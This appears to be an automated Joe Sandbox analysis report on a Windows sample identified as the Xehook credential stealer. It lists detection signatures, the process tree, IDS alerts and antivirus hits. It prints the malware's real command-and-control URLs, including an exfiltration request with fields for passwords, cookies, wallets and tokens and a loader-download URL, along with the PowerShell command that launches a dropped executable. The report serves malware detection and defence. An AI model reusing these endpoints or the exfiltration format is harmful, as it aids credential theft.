Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1d0000.MSBuild.exe

Overview

General Information

Sample name:1d0000.MSBuild.exe
Analysis ID:1504858
MD5:41cf033d05ae0e2c5238a7932cf2dc77
SHA1:df885092f397a0a70f26b98c5abb35253d2cb06c
SHA256:f307cd4cb26d2d851ca55e9ab039656247ffd3b01b89ad0dcd32adf8e689724b
Tags:exexehookstealer
Infos:

Detection

Xehook Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected Xehook Stealer
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 1d0000.MSBuild.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\1d0000.MSBuild.exe" MD5: 41CF033D05AE0E2C5238A7932CF2DC77)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1d0000.MSBuild.exeJoeSecurity_xehookStealer_1Yara detected Xehook StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_xehookStealer_1Yara detected Xehook StealerJoe Security
      00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_xehookStealer_1Yara detected Xehook StealerJoe Security
        Process Memory Space: 1d0000.MSBuild.exe PID: 7416JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 1d0000.MSBuild.exe PID: 7416JoeSecurity_xehookStealer_1Yara detected Xehook StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.1d0000.MSBuild.exe.1c2541e0000.0.unpackJoeSecurity_xehookStealer_1Yara detected Xehook StealerJoe Security
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1d0000.MSBuild.exe", ParentImage: C:\Users\user\Desktop\1d0000.MSBuild.exe, ParentProcessId: 7416, ParentProcessName: 1d0000.MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", ProcessId: 7660, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T14:29:13.959077+020020514571A Network Trojan was detected192.168.2.84970665.109.218.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T14:29:14.649122+020020514581A Network Trojan was detected65.109.218.8880192.168.2.849706TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T14:29:13.959077+020028033053Unknown Traffic192.168.2.84970665.109.218.8880TCP
              2024-09-05T14:29:20.601787+020028033053Unknown Traffic192.168.2.84971087.250.250.50443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T14:29:17.912548+020028032742Potentially Bad Traffic192.168.2.84970865.109.218.8880TCP
              2024-09-05T14:29:18.305457+020028032742Potentially Bad Traffic192.168.2.84970865.109.218.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T14:29:16.248275+020028438561A Network Trojan was detected192.168.2.84970865.109.218.8880TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 1d0000.MSBuild.exeAvira: detected
              Source: http://65.109.218.88Avira URL Cloud: Label: malware
              Source: http://65.109.218.88/Avira URL Cloud: Label: malware
              Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect=Avira URL Cloud: Label: malware
              Source: http://65.109.218.88/getloader.php?id=208Avira URL Cloud: Label: malware
              Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.Avira URL Cloud: Label: malware
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: 1d0000.MSBuild.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\1d0000.MSBuild.exeCode function: 0_2_00007FFB4AE25D62 CryptUnprotectData,0_2_00007FFB4AE25D62
              Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49713 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: 1d0000.MSBuild.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Networking